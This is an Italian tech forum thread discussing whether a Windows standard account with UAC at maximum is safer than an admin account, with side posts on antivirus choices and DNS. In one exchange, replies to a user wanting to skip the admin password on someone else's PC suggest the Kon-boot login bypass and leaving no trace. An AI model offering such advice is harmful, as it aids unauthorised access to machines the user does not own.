l'UAC è al massimo.

Dall'altra parte ho un malware che richiede privilegi elevati per compiere completamente la propria azione.

Ipotizziamo che questi privilegi se li conquisti "con calma", senza fretta.

L'esecuzione del malware, dunque, avviene con privilegi che sono quelli dell'utente amministratore castrato.
Questo, a regola, gli è sufficiente per scrivere alcuni dati in una particolare zona dell'HD, il profilo dell'utente stesso.

Fino a qui, il malware fa pochi danni.

Ora:
poichè molte applicazioni sfruttano elementi che si trovano proprio in quel particolare spazio ("Many applications read settings and load extensions registered in a user’s profile..."), se per qualche motivo un processo chiede legittimamente "più privilegi" e, cosi' facendo, "chiama in causa" un altro processo che pesca i dati che gli sono necessari da questa zona "condivisa e precedentemente alterata" dal malware, il processo (che a questo punto è elevato) "si infetta" e il malware "si riattiva stavolta anch'esso elevato" portando finalmente a termine la propria missione.

+ o - dovrebbe essere cosi'...

Alla fin della fiera, avrei capito questo:
- se si usa l'account standard, dovrebbero esserci due avvisi di richiesta permesso: quello dell'amministratore e quello dell'UAC in caso di risposta positiva del primo;
- se si usa invece l'account admin, c'e' solo l'UAC a difendere la torre (tralasciando antivirus, firewall etc. etc.).

Giusto? :stordita:

e' la filosofia che usano anche molti programmi di sicurezza ,se ci si fida di un programma ,trusted,tutto cio' che fara' sara trusted,almeno che non lo si segua passo passo,ma cio comporta molte richieste...l'importante e rispondere bene alle richieste

si anche se stavo parlando di un'altra cosa: delle differenze che, secondo me, ci sono tra un'elevazione di privilegi stile UAC e un RunAs.

Però onestamente non so, mi stanno venendo dei dubbi su quello che ho scritto.

Alla fin della fiera, avrei capito questo:
- se si usa l'account standard, dovrebbero esserci due avvisi di richiesta permesso: quello dell'amministratore e quello dell'UAC in caso di risposta positiva del primo;
- se si usa invece l'account admin, c'e' solo l'UAC a difendere la torre (tralasciando antivirus, firewall etc. etc.).

Giusto? :stordita:

No è sempre e solo uno l'avviso.
Nel caso di:
- utente standard l'avviso presenta anche la richiesta di password perchè devi elevare quel processo ad admin;
- utente admin devi solo cliccare si o no

:)

se per qualche motivo un processo chiede legittimamente "più privilegi" e, cosi' facendo, "chiama in causa" un altro processo che pesca i dati che gli sono necessari da questa zona "condivisa e precedentemente alterata" dal malware, il processo (che a questo punto è elevato) "si infetta" e il malware "si riattiva stavolta anch'esso elevato" portando finalmente a termine la propria missione.

+ o - dovrebbe essere cosi'...

certo ma questo se... che dici tu : ha bisogno che l'utente dietro al pc ,alla domanda vuoi che il programma tizio....deve dire si,altrimenti quel malware resterà sempre li...e non oltre.

facciamo 1 cosa:

si chiede il conforto di eraser ;)


Lo privatizzo, e sempre che mi caghi...:fiufiu:

Alla fin della fiera, avrei capito questo:
- se si usa l'account standard, dovrebbero esserci due avvisi di richiesta permesso: quello dell'amministratore e quello dell'UAC in caso di risposta positiva del primo;
- se si usa invece l'account admin, c'e' solo l'UAC a difendere la torre (tralasciando antivirus, firewall etc. etc.).

Giusto? :stordita:

???

account standard, 2 avvisi??
Ne avrai solo 1, cosi' come solo 1 è il popup nell'ipotesi in cui tu sia utente amministratore ridotto..

facciamo 1 cosa:

si chiede il conforto di eraser ;)


Lo privatizzo, e sempre che mi caghi...:fiufiu:

hai la memoria corta...adesso vado a cercare nel tuo thread,già ne abbiamo parlato tempo fa'...e ricordo che disse che il pericolo principale erano una serie infinta di richieste a raffica a cui l'utente poteva cedere:sofico:

No è sempre e solo uno l'avviso.
Nel caso di:
- utente standard l'avviso presenta anche la richiesta di password perchè devi elevare quel processo ad admin;
- utente admin devi solo cliccare si o no

:)

Ma scusa Cloutz, utilizzando solo l'utente standard, l'intervento dell'UAC quando si avrebbe? :stordita:

???

account standard, 2 avvisi??
Ne avrai solo 1, cosi' come solo 1 è il popup nell'ipotesi in cui tu sia utente amministratore ridotto..

Ho letto prima il post di Cloutz, ho chiesto gia' a lui, il post sopra questo :D

ecco

Quando si parla di bypassare lo UAC si parla di falle di design ben conosciute e che possono essere utilizzate per evitare di incappare nelle maglie della sicurezza di Windows Vista/7. Nell'articolo è ben specificato che il problema è lo UAC a livello di default, ed è anche spiegato il perché esista il problema.

Lo UAC configurato al livello più alto non verrà automaticamente bypassato, sempre che l'utente stesso non sia ingannato e dia volontariamente il consenso alla finestra di avviso (opzione tutt'altro che remota).

?

Ma scusa Cloutz, utilizzando solo l'utente standard, l'intervento dell'UAC quando si avrebbe? :stordita:

Sostanzialmente in un unico avviso hai sia la richiesta di privilegi che di uac.
D'altronde è anche corretto!

Per evitare che chiunque da un utente standard possa far girare programmi pericolosi semplicemente dicendo "SI, lo voglio" :D, nello stesso avviso (se la richiesta è partita da un account standard) è richiesto anche l'inserimento della password di un utente amministratore.


----------------------------------------
Esempio idiota: :D
account limitato = adolescente non maggiorenne
account admin = persona maggiorenne responsabile

1)
UAC: "Ciao Ragazzo, vuoi avviare questo processo? E' una cosa pericolosa per cui non basta che tu lo voglia, mi serve il permesso di un maggiorenne."
Ragazzo: inserisce la password da admin (si presuppone che solo l'admin ce l'abbia), identificandosi quindi come maggiorenne.
UAC: Accetta

2)
UAC: "Ciao Adulto, vuoi avviare questo processo? E' una cosa pericolosa, ma essendo tu un adulto maggiorenne responsabile, mi basta che tu dica di si."
Adulto: "Si"
UAC: Accetta


Ti immagini cosa succederebbe altrimenti?
Inserire due avvisi, oltretutto, sarebbe ridondante e cadresti nel caso "dico si all'uac ma non so la password di admin", una sorta di "voglio avviarlo ma non posso".
A questo punto ti blocco appena posso, evitando casi strani e pericoli su una gestione così

Ma scusa Cloutz, utilizzando solo l'utente standard, l'intervento dell'UAC quando si avrebbe? :stordita:

in poche parole?

Quando tenti di installare qualcosa, operazione che evidentemente immagino tu non faccia ogni 3x2 ma giusto 1/massimo 2 volte per sessione.


Di conseguenza, a che pro assegnare di default > privilegi all'utente quando questo, di fatto, può svolgere il suo lavoro quotidiano anche con pochissimi privilegi?

Da qui nasce l'idea...

Sostanzialmente in un unico avviso hai sia la richiesta di privilegi che di uac.
D'altronde è anche corretto!

Per evitare che chiunque da un utente standard possa far girare programmi pericolosi semplicemente dicendo "SI, lo voglio" :D, nello stesso avviso (se la richiesta è partita da un account standard) è richiesto anche l'inserimento della password di un utente amministratore.

Ti immagini cosa succederebbe altrimenti?

Grazie per la delucidazione.
E grazie anche agli altri utenti che si stanno "dannando" per colpa mia :D :eek: :stordita: :p

Ciaoooo :)

Grazie per la delucidazione.
E grazie anche agli altri utenti che si stanno "dannando" per colpa mia :D :eek: :stordita: :p

Ciaoooo :)

i confronti quando sono costruttivi...anche se accesi,sono positivi.
poi ognuno fa come crede,fino a poco tempo fa anchio usavo il doppio account,poi ripeto dopo varie prove sono giunto alla conclusione che posso sopravvivere con un solo account e uac al massimo...stando bene attento a cosa acconsento
saluti;)

Come anticipato da qualcuno, se sulla postazione agiscono più persone l'account standard è d'obbligo :stordita:
Altra cosa: dai tempi di Vista (quindi diciamo 4-5 anni fa) che utilizzo l'utente standard e tutto al massimo livello e si e no forse ho switchato utente una decina di volte :mbe: Sarei curioso di sapere quali siano le numerose operazioni che vi impongono questo passaggio di utenza :fagiano:

Praticamente (seven sto ancora imparando ad usarlo bene) ho scoperto, anzi per meglio dire ho capito, che in fase di installazione di un programma e/o di un aggiornamento, bisogna stare attenti al percorso dato oppure preso in automatico.

?

Con thunderbird ad esempio, pur non avendocelo installato nell'account admin ma solo nell'utente standard (ovvero account limitato), accadeva che gli aggiornamenti del programma me li portava nell'admin (il percorso se lo prendeva in automatico anche se sbagliato, ma non per colpa sua); ho dovuto modificare il percorso dell'aggiornamento manualmente per portarmelo nell'account standard.
Idem con papate per firefox: quando scarico qualcosa, me lo faccio portare sul desktop, ma accadeva che il percorso preso era il desk admin e non il mio :p
Quindi mi ritrovavo un sacco di download nell'admin e non nel mio account che pensavo d'aver perso per un non so quale motivo. Naturalmente firefox lo avevo scaricato come browser nell'account standard e non admin.
Mea culpa. . .
Vorra' dire che d'ora innanzi staro' piu' attento al percorso ecomunque, ho imparato una cosa nuova su seven ;)

mah, vi dico come solitamente uso io il PC.

Pur essendo io l'unico utilizzatore :D , ho 2 account (admin e standard) e l'UAC impostato al massimo.

Mi loggo xò sempre come standard e da li' eseguo tutte le operazioni (installazioni, ecc).

Per le installazioni, in particolare, non le relego al solo account in uso (standard) ma dispongo in fase di setup che il programma sia disponibile ed utilizzabile per entrambi gli account...

Visto che sono io l'unico soggetto che mette mano al PC, è curioso che mi auto-chieda la password :D ogni volta c'è un'installazione da fare, ma tant'è...:fiufiu: :asd:

A guardar bene, dunque, non rilevo altre "magie" e l'esperienza d'uso della macchina è serena...:)

Niente saltellamenti di account nè complicazioni di altra natura.

Dimenticavo:
altro caso in cui mi si apre il popup di elevazione dei privilegi (OTS perchè sono in un account standard...) è quando lancio (per sfizio) HitmanPro...:Prrr:

Come anticipato da qualcuno, se sulla postazione agiscono più persone l'account standard è d'obbligo :stordita:
Altra cosa: dai tempi di Vista (quindi diciamo 4-5 anni fa) che utilizzo l'utente standard e tutto al massimo livello e si e no forse ho switchato utente una decina di volte :mbe: Sarei curioso di sapere quali siano le numerose operazioni che vi impongono questo passaggio di utenza :fagiano:

ogni volta che switchavo da limitato ad amministratore ...c'erano un sacco di programmi che mi chiedevano l'aggiornamento,quindi in limitato non avevano neanche il diritto di chiederlo...venivano bloccati in automatico
per la questione dell'ereditarietà infatti programmi nati sotto standard,al momento dell'aggiornamento non davano richieste...e questo mi scocciava...;)

il pc dei mei bambini e' configurato come quello di Nv,con norton dsn al massimo livello per filtrare contenuto per adulti,
tempo fa avevo messo la restrizione ancora piu' forte protezione bambini,...ne avevamo discusso anche con Samphei che aprofitto per salutare (non si vede da un po'),ma dava problemi con chrome

certo ma questo se... che dici tu : ha bisogno che l'utente dietro al pc ,alla domanda vuoi che il programma tizio....deve dire si,altrimenti quel malware resterà sempre li...e non oltre.

vedi, è proprio diverso:

il popup relativo alla richiesta di maggiori privilegi non lo produce il malware (vedi l'es. materiale che ho portato qui (http://www.hwupgrade.it/forum/showpost.php?p=37693155&postcount=4920)) bensi' un qualsiasi processo che, legittimamente e chissà dopo quanto tempo (10 secondi? 7 ore? tra 3 sessioni?), ha bisogno di > privilegi.

Il malware, rimasto silente fino ad allora, "sfrutta questo momento" per lanciarsi nuovamente ma con privilegi elevati e sei del gatto...


Peraltro, anche il post che hai portato di eraser non c'azzecca nulla in questo contesto visto che lui, allora, parlava di altre cose...

Chiaro? :ciapet:

vedi, è proprio diverso:

il popup relativo alla richiesta di maggiori privilegi non lo produce il malware (vedi l'es. materiale che ho portato qui (http://www.hwupgrade.it/forum/showpost.php?p=37693155&postcount=4920)) bensi' un qualsiasi processo che, legittimamente e chissà dopo quanto tempo (10 secondi? 7 ore? tra 3 sessioni?), ha bisogno di > privilegi.

Il malware, rimasto silente fino ad allora, "sfrutta questo momento" per lanciarsi nuovamente ma con privilegi elevati e sei del gatto...


:
per far ciò ha bisogno di un consenso



Peraltro, anche il post che hai portato di eraser non c'azzecca nulla in questo contesto visto che lui, allora, parlava di altre cose...

:
ma si parlava proprio di questo... leggitelo bene





Chiaro? :ciapet:

a me si chiarissimo...e a te :ciapet:

?



mah, vi dico come solitamente uso io il PC.

Pur essendo io l'unico utilizzatore :D , ho 2 account (admin e standard) e l'UAC impostato al massimo.

Mi loggo xò sempre come standard e da li' eseguo tutte le operazioni (installazioni, ecc).

Per le installazioni, in particolare, non le relego al solo account in uso (standard) ma dispongo in fase di setup che il programma sia disponibile ed utilizzabile per entrambi gli account...

Visto che sono io l'unico soggetto che mette mano al PC, è curioso che mi auto-chieda la password :D ogni volta c'è un'installazione da fare, ma tant'è...:fiufiu: :asd:

A guardar bene, dunque, non rilevo altre "magie" e l'esperienza d'uso della macchina è serena...:)

Niente saltellamenti di account nè complicazioni di altra natura.

Dimenticavo:
altro caso in cui mi si apre il popup di elevazione dei privilegi (OTS perchè sono in un account standard...) è quando lancio (per sfizio) HitmanPro...:Prrr:
Ho scritto che devo stare attento al percorso perche' d'ora in poi, quando installo qualcosa, avendo capito la differenza fra admin e standard, mi comportero' di conseguenza.
In pratica a volte (tanto per fare un esempio) durante un'installazione di qualche software, questo mi chiede se l'installazione vale per tutti gli utenti o solo per qualcuno specificato, ergo. . . :D

ti voglio fare contento inviami in pvt un malware capace di fare quello che dici tu,cioe' infettare un admin con uac al massimo e invece di bloccarsi con account limitato...
allora ti daro' ragione:D

ti voglio fare contento inviami in pvt un malware capace di fare quello che dici tu,cioe' infettare un admin con uac al massimo e invece di bloccarsi con account limitato...
allora ti daro' ragione:D

ho letto un'articolo stamani in una newsletter in lingua inglese e diceva in poche parole chi usa il firewall di seven o di windows 8 di affiancarne un'altro con la funzione di completare il firewall di windows, diceva Tiny Wall e un'altro non ricordo il nome perchè ci sono dei malware fatti apposta per non essere visti nè da uac e disabilitare o prendere il permesso di amministratore :D

ho letto un'articolo stamani in una newsletter in lingua inglese e diceva in poche parole chi usa il firewall di seven o di windows 8 di affiancarne un'altro con la funzione di completare il firewall di windows, diceva Tiny Wall e un'altro non ricordo il nome perchè ci sono dei malware fatti apposta per non essere visti nè da uac e disabilitare o prendere il permesso di amministratore :D

quando si parla di uac la maggioparte si riferisce al livello standard,quindi stai tranquillo:D

per far ciò ha bisogno di un consenso


nell'esempio che ti ha fatto il consenso ti verrebbe chiesto per un'applicazione legittima.
Perchè mai dovresti negargli l'avviso UAC?


nell'ipotesi fatta, l'applicazione maligna aspettava proprio questo, che tu dessi privilegi di amministratore a qualcun altro (chi sarebbe così s***o da consentire avvisi di sicurezza per un'applicazione sospetta?)

nell'esempio che ti ha fatto il consenso ti verrebbe chiesto per un'applicazione legittima.
Perchè mai dovresti negargli l'avviso UAC?


nell'ipotesi fatta, l'applicazione maligna aspettava proprio questo, che tu dessi privilegi di amministratore a qualcun altro (chi sarebbe così s***o da consentire avvisi di sicurezza per un'applicazione sospetta?)
nella pratica l'ipotesi e' molto remota,è la stessa probabilità che si infetti un account limitato


Ora:
poichè molte applicazioni sfruttano elementi che si trovano proprio in quel particolare spazio ("Many applications read settings and load extensions registered in a user’s profile..."), se per qualche motivo un processo chiede legittimamente "più privilegi" e, cosi' facendo, "chiama in causa" un altro processo che pesca i dati che gli sono necessari da questa zona "condivisa e precedentemente alterata" dal malware, il processo (che a questo punto è elevato) "si infetta" e il malware "si riattiva stavolta anch'esso elevato" portando finalmente a termine la propria missione.

+ o - dovrebbe essere cosi'...
ho chiesto un esempio pratico...faccio da cavia se volete

l'esempio pratico te lo darà su tutti eraser e in subordine fcorbelli che conoscono la materia molto meglio di me...


Quello che si ricava cmq dalla traduzione + un pò di logica, è quello.

Prova te a dare un'interpretazione alle cose che dice Mark Russinovich e poi vediamo. ;)

la tua esperienza, infatti, in questo caso vale 0:

vuoi perchè avrai avuto modo di testare 5 malware (a caso), vuoi perchè evidentemente non hai lanciato quelli giusti.

Ma anche fosse solo teoria, Russinovich ( e non arnyreny o nV 25 :read: ) dice che le 2 cose non sono equivalenti.

Non so se è chiaro...

preso dunque per buono che

E' PIU' SICURO

loggarsi come utente standard + UAC al massimo (quest'ultimo aspetto x tanti motivi che peraltro IO conosco...)

CHE NON

accedere come admin ridotto + UAC al massimo,

aspetto eraser o, pazientemente, anche fcorbelli o chi per loro è veramente in grado di chiarire chi ha ragione (perchè qualcuno ci sarà, spero)...

l'esempio pratico te lo darà su tutti eraser e in subordine fcorbelli che conoscono la materia molto meglio di me...


Quello che si ricava cmq dalla traduzione + un pò di logica, è quello.

Prova te a dare un'interpretazione alle cose che dice Mark Russinovich e poi vediamo. ;)

la mia professione non e' questa...ma nel mio piccolo mi piace fare affidamento sempre alla pratica....
la teoria se non e' applicata e' solo chiacchiere
io ho fatto delle prove E sono del parere che se un malware riesce ad aggirare l'uac al massimo scommetto che riesce ad aggirare anche un account limitato...
se mi provano il contrario sono felice di cambiare idea...
;)

è possibile ma non è quello il punto:

per tanti motivi che sono presenti nei passaggi che ho scritto oggi e ricavati da Wilders che a sua volta rimanda a dei lavori di Russinovich, si asserisce che le 2 figure sono diverse anche sotto un profilo di sicurezza.

Capisco che il confine sia labile, ma esiste:
stà solo a te capirlo... o accettarlo???

è possibile ma non è quello il punto:

per tanti motivi che sono presenti nei passaggi che ho scritto oggi e ricavati da Wilders che a sua volta rimanda a dei lavori di Russinovich, si asserisce che le 2 figure sono diverse anche sotto un profilo di sicurezza.

Capisco che il confine sia labile, ma esiste:
stà solo a te capirlo... o accettarlo???

per me e' trascurabile rispetto ai rompimenti che mi girano attorno,e' questo che non riesco a spiegarti

io credo che microsoft abbia introdotto l'uac apposta per questo,se l'utente del pc e' uno solo...l'uac ha il compito di rendere quel admin sicuro quasi quanto lo sia l'account limitato

Ho scritto che devo stare attento al percorso perche' d'ora in poi, quando installo qualcosa, avendo capito la differenza fra admin e standard, mi comportero' di conseguenza.
In pratica a volte (tanto per fare un esempio) durante un'installazione di qualche software, questo mi chiede se l'installazione vale per tutti gli utenti o solo per qualcuno specificato, ergo. . . :D
poichè in questo caso "nel + ci stà il -", sempre la 1°....:)


Ora è arrivato il momento del letto ma sono curioso di vedere eventuali sviluppi domani...

Notte...

..se l'utente del pc e' uno solo...l'uac ha il compito di rendere quel admin sicuro quasi quanto lo sia l'account limitato
hai detto bene:
quasi...

Ma visto che a casa mia quasi è diverso da uguale...

Ci sono infatti altri elementi che entrano in gioco, e uno di questi è lo spazio-condiviso in termini di profilo-utente che esiste tra un account admin-ridotto & l'elevato che può andare a ripescare (e caricare) elementi proprio nella zona che anche il malware potrebbe aver toccato pur girando anch'esso inizialmente castrato.

Fine.


+ chissà quante altre cose a me ignote...

è possibile ma non è quello il punto:


Capisco che il confine sia labile, ma esiste:
[/B]???

Per un confine cosi' sottile corrisponde una differenza in sicurezza altrettanto sottile,ma con il guadagno di non dover switchare tra admin,e limitato...
risparmiando tempo ed energia :D :sofico:
al prezzo di quella sottile differenza:fiufiu:

per me e' trascurabile rispetto ai rompimenti che mi girano attorno,e' questo che non riesco a spiegarti

io credo che microsoft abbia introdotto l'uac apposta per questo,se l'utente del pc e' uno solo...l'uac ha il compito di rendere quel admin sicuro quasi quanto lo sia l'account limitato

d'accordissimo con l'amico arny e se uno è paranoico sulla sicurezza tanto vale non usare windows ;) io sto con uac al massimo o a default sul muletto e sono admin e sopratutto non voglio rompermi a switchare tra utenti se devo fare home bancking uso una live di linux oppure un pc con linux arch istallato ;) ma se deve essere una lotta usare il PC allora è finita :D
e sono anni che navigo dappertutto e non prendo nessun malware

Su XP l'account limitato talvolta è scomodo, ma su Vista e Seven non mi sembra un gran problema, visto che puoi installare qualsiasi cosa dall'identità limitata inserendo le credenziali di amministratore, al limite, per i programmi che hanno difficoltà, come quello menzionato da Kohai, basta eseguirlo come amministratore dall'identità limitata in fase di aggiornamento.

ti voglio fare contento inviami in pvt un malware capace di fare quello che dici tu,cioe' infettare un admin con uac al massimo e invece di bloccarsi con account limitato...
allora ti daro' ragione:D

nella pratica l'ipotesi e' molto remota,è la stessa probabilità che si infetti un account limitato

ho chiesto un esempio pratico...faccio da cavia se volete

Flame o Flamer che dir si voglia, l'eseguibile era firmato dalla stessa Microsoft.

Muahh, qui qualcuno è fuori...

Se cmq avete trovato un vostro equilibrio, meglio per tutti...:fiufiu:

Muahh, qui qualcuno è fuori...

Se cmq avete trovato un vostro equilibrio, meglio per tutti...:fiufiu:

tra santi e falsi dei.

tra santi e falsi dei.
torno a dire che a me piacerebbe conoscere la VERA lettura, quella di eraser...che xò è preso solo a rispondere su piazze internazionali :boxe: :incazzed: ...

ora lo ri-privatizzo sperando di buttarlo giù dal letto :asd:...

vuoi perchè avrai avuto modo di testare 5 malware (a caso), vuoi perchè evidentemente non hai lanciato quelli giusti.



qui si parla di un malware tosto no i 5 che ho provato io,di una bestiaccia
un test proprio di Eraser

a cui faccio la stessa domanda che vuoi fare tu

Te lo confermo: con l'UAC al massimo, se l'utente non si lascia ingannare, il malware non può ottenere i privilegi necessari per funzionare.

(Comunque, giusto per dovere di cronaca, esistono anche quei malware che ti chiedono ripetutamente i privilegi di amministratore, in un ciclo infinito fino a quando l'utente non da il consenso :) )


ma di cosa stai parlando? smettila ....

hai la memoria corta...oppure non leggi cio' che si scrive

per chi non crede a cio che ho detto qui c'e' la risposta integrale
http://www.hwupgrade.it/forum/showpost.php?p=35587351&postcount=3150

non solo non sai di cosa stai parlando (legittimo) ma non capisci neppure le spiegazioni che ti vengono date:
lecito anche questo, ma almeno fai silenzio.

Su XP l'account limitato talvolta è scomodo, ma su Vista e Seven non mi sembra un gran problema, visto che puoi installare qualsiasi cosa dall'identità limitata inserendo le credenziali di amministratore, al limite, per i programmi che hanno difficoltà, come quello menzionato da Kohai, basta eseguirlo come amministratore dall'identità limitata in fase di aggiornamento.
Concordo con quanto asserito.

non solo non sai di cosa stai parlando (legittimo) ma non capisci neppure le spiegazioni che ti vengono date:
lecito anche questo, ma almeno fai silenzio.

sei una persona maleducata e poco aperta alle idee deli altri
rimani della tua idea,ma non negare l'evidenzia,
offendi l'intelligenza di chi legge su questo forum

alla fine,secondo me sei rimasto ad xp......:doh:

sei una persona maleducata e poco aperta alle idee deli altri
rimani della tua idea,ma non negare l'evidenzia,
offendi l'intelligenza di chi legge su questo forum

alla fine,secondo me sei rimasto ad xp......:doh:
certo, alla fine si diventa maleducati quando si ha a che fare con duri come il granito e, per di più, anche saccenti...è inevitabile...

State bbboni ragazzi che mi fate sentire in colpa :vicini:
A scanso di equivoci e comunque continuero' ad usare l'account limitato (standard in seven) con UAC al massimo. . .
E dire che la domanda mi sembrava scontata. . . vediamo cosa ne esce fuori anche per curiosita' e cultura personale :)

il punto non è il fatto che tu usi la configurazione X o Y:
per quanto mi riguarda, infatti, ciascuno è libero di usare anche la Z se è quella che preferisce.

Il nocciolo, dunque, è solo quello di dire fesserie o non dirne.

In subordine, dirle...ma accettare le correzioni e non arroccarsi su posizioni evidentemente scorrette.

qui si parla di un malware tosto no i 5 che ho provato io,di una bestiaccia
un test proprio di Eraser

a cui faccio la stessa domanda che vuoi fare tu




ma di cosa stai parlando? smettila ....

hai la memoria corta...oppure non leggi cio' che si scrive

per chi non crede a cio che ho detto qui c'e' la risposta integrale
http://www.hwupgrade.it/forum/showpost.php?p=35587351&postcount=3150

non solo non sai di cosa stai parlando (legittimo) ma non capisci neppure le spiegazioni che ti vengono date:
lecito anche questo, ma almeno fai silenzio.

sei una persona maleducata e poco aperta alle idee deli altri
rimani della tua idea,ma non negare l'evidenzia,
offendi l'intelligenza di chi legge su questo forum

alla fine,secondo me sei rimasto ad xp......:doh:

certo, alla fine si diventa maleducati quando si ha a che fare con duri come il granito e, per di più, anche saccenti...è inevitabile...

5GG di pausa per rassenare gli animi.

Salve a tutti.
Ho scaricato HitmanPro 3 ma ho notato che non si installa in nessuna cartella sotto programmi.
Si avvia direttamente con quell'unico file scaricato, è normale?
E' un software "portable" senza installazione?
Grazie del chiarimento.

Hai controllato qui?

http://img94.imageshack.us/img94/6890/58371428.jpg (http://imageshack.us/photo/my-images/94/58371428.jpg/)

Anche se decidessi di installarlo alla fine copia solo quell'eseguibile in C:\Program Files\HitmanPro e crea un'altra cartella in C:\ProgramData\HitmanPro
Viene anche scritta una chiave nel registro
In definitiva si, si può considerare portable

La cosa strana è che se clicco sul file scaricato normalmente dal sito si avvia automaticamente il programma senza far partire nessuna installazione.

Fa niente, l'importante che funzioni...anzi meglio cosi, non lascia "sporcizia" in giro.

io dopo varie prove che ho fatto sul mio netbook (3gb ram, AMD APU Fusion dulacore) approfittando del fatto che ho fatto una immagine di backup recentemente se devo consigliare oggi un AV free starei su 1 di questi 2 prodotti, il primo classico e il secondo cloud:

- Roboscan IS Free (http://www.roboscan.com/home/home_main.aspx): in inglese solo. AV classico senza fronzoli vari che reputo da sempre inutili (Email scan, webpretection, comunity varie) è un dual engine che sfrutta le firme BitDefender che quest'anno i vari test mettono sempre ai primi posti, ha anche le sue firme interne per i malware a ulteriore copertura. Semplicissimo e con in aggiunta un Firewall attivabile volendo che è molto meglio di quello Windows. Abbastanza leggero e con poche scritture I\O su HD. Basta attivare l'euristica (disattivata a default) e mettere l'update ogni 2 ore, sono gli unici interventi da fare, volendo anche aggiungere la scansione dei file zippati che comunque è cosa inutile poichè fosse infetto l'archivio l'AV interviene poi quando si scompatta. Mi ha fatto ottima impressione ed infatti è divenuto l'AV sul mio piccoletto.

- KingSoft Antivirus 2012 Free (http://www.kingsoftsecurity.com/forum/viewtopic.php?f=9&t=686): in inglese anche questo AV cinese (KingSoft è conosciuta ai più per il suo simil office presente anche su molti smartphone). Si tratta invece di un AV basicamente cloud che scarica sul pc solo il necessario per dare una copertura base in caso di offline ma fa tutto via web. Usa il suo engine proprietario e copre ogni possibile vulnerablità, ha il controllo web, posta, msn, vari scudi di difesa preventiva. Molto veloce in scansione e decisamente leggero oltre che "fighetto" a vedersi. Un prodotto completo per chi vuole una soluzione cloud ed è davvero efficace, provato con liste malware nuovi zero days ne lascia scaricare ben pochi e quei pochi li blocca prima dell'esecuzione. Peccato gli I\O su HD si facciano sentire sul mio HD rumoroso, ragione per cui l'ho accantonato. Può essere usato anche assieme ad un altro AV (Kaspy escludo), in genere non da problemi.

buongiorno
devo installare thunderbird su 7
ma mi richiede la password
ora la password non la conosco
come posso fare a installare thunderbird e aggirare la richiesta della password

buongiorno
devo installare thunderbird su 7
ma mi richiede la password
ora la password non la conosco
come posso fare a installare thunderbird e aggirare la richiesta della password

Quale password? Quella di un utente amministratore del computer? Chiedila all'amministratore del sistema, altre risposte sull'argomento credo non ne riceverai qui :)

Puoi communque usare una versioen portatile di Thunderbird che non necessita di installazione. Esistono diverse "distribuzioni" di Thunderd portatile, una affidabile è questa:
http://portableapps.com/apps/internet/thunderbird_portable


Saluti.

quello che volevo sapere era se si poteva togliere la restrizione di amministrazione uac senza conoscere la password
dato che il pc non è mio penso che risalire alla password sarà difficile
compri'
pazienza installero' la versione .zip
grazie

quello che volevo sapere era se si poteva togliere la restrizione di amministrazione uac senza conoscere la password
dato che il pc non è mio penso che risalire alla password sarà difficile
compri'


Avendo la possibilità di mettere le mani su un personal computer è possibile fare quasi tutto, anche risalire alla password, di certo è che se se ne accorge il proprietario o l'amministratore di sistema poi ti accompagnerà docilmente in sala mensa dove ti sodomizzerà pubblicamente a mo di esempio.


pazienza installero la versione .zip

Bravo! Meglio ancora, molto meglio, se lo fai su chiavetta USB. Così non resta traccia facilmente rintracciabile sul PC.



Saluti.

quello che volevo sapere era se si poteva togliere la restrizione di amministrazione uac senza conoscere la password
dato che il pc non è mio penso che risalire alla password sarà difficile
compri'
pazienza installero' la versione .zip
grazie

ti ci vorrebbe Kon-boot ;) alla schermata di login dai solo invio e entri dentro windows come avessi digitato la password

Dò il mio consiglio per la protezione del computer (windows in particolare), ed è il programmello snapshot.
Il quale funziona molto bene per creare immagini anche di partizioni di sistema, costa poco, è molto piccolo, e funziona ragionevolmente bene su parecchi tipi (praticamente tutti) i sistemi operativi microsoft.

Contiene tra l'altro una comoda funzione differenziale che utilizza solo gli hash dei file (significa che si può "parcheggiare" il backup full iniziale), è facile da usare in formato batch.

Occorre però utilizzare un "decimatore" di file, nel caso lo si utilizzi per backup all'avvio, e non è semplicissimo avviarlo da USB (io prediligo un'immagine ISO con doppio emulatore e FreeDOS autocostruita).

E' anche comodo per "montare" i backup
---
Esempio di utilizzo: sulla mia macchina windows fa copie differenziali in circa 2 minuti, le tengo direttamente in esecuzione automatica.
Tra i programmi (windows) che conosco è il meno invasivo e il più adatto come antivirus "brutale"

Un'altro consiglio da tenere fortemente in considerazione per la protezione del computer è questo > http://www.hwupgrade.it/forum/showpost.php?p=10217225&postcount=3 (http://www.hwupgrade.it/forum/showpost.php?p=10217225&postcount=3) ;)

salve, ho installato sul mio notebook hp (windows 7 home premium 64 bit) comodo firewall, e l'ho configurato seguendo la guida in pdf scaricata da questo forum. Alla fine della guida c'era un approfondimento su come sandboxare il browser permanentemente, l'ho seguita alla lettera e tutto funziona. C'è solo un piccolo problema: ogni volta che in internet explorer 8 aprò una nuova scheda, mi esce l'avviso del controllo account utente di windows, dove mi chiede se consentire o meno java. Per non far più uscire l'avviso, cosa devo fare? devo reinstallare java o il browser, o altro?
grazie.

Sul pc di un amico in azienda, ho dovuto installare la RP di Windows 8, visto che era sprecato comprare una licenza di 7 che tra qualche mese sarebbe andato in pensione.
Lui ha Kaspersky che ahimè non è possibile installare perchè incompatibile con Win8.
Ora come ora non c'è nulla, oltre all'antivirus di casa Microsoft.
Cosa consigliate di installarci di free che sia compatibile con la RP di Windows 8?
Browser ho messo chrome + adblock ma ho notato che se apro tante tab va in blocco tutto il pc, cosa che ie non fa, a sto punto mi sa gli installerò firefox sempre con l'aggiunta di adblock.
Ulteriore software?

Sul pc di un amico in azienda, ho dovuto installare la RP di Windows 8, visto che era sprecato comprare una licenza di 7 che tra qualche mese sarebbe andato in pensione.
Lui ha Kaspersky che ahimè non è possibile installare perchè incompatibile con Win8.
Ora come ora non c'è nulla, oltre all'antivirus di casa Microsoft.
Cosa consigliate di installarci di free che sia compatibile con la RP di Windows 8?
Browser ho messo chrome + adblock ma ho notato che se apro tante tab va in blocco tutto il pc, cosa che ie non fa, a sto punto mi sa gli installerò firefox sempre con l'aggiunta di adblock.
Ulteriore software?

di compatibile c'e' avast oppure una beta di comodo...io ho chrome dev e nessun problema con 8,
aggiungerei norton dsn e uac al massimo;)

ma sono incompatibili hostman e i norton dns?
ho provato ad installare il primo citato con tutte le source list integrate e non riuscivo ad aprire più alcun sito... :mbe:
credo ci sia qualcosa che non và in quanto dopo aggiornato l'hosts file schizza fisso uno svchost.exe al 50% rallentando il pc!

Vuoi un consiglio? Utilizza i DNS predefiniti del tuo ISP e vivi felice.
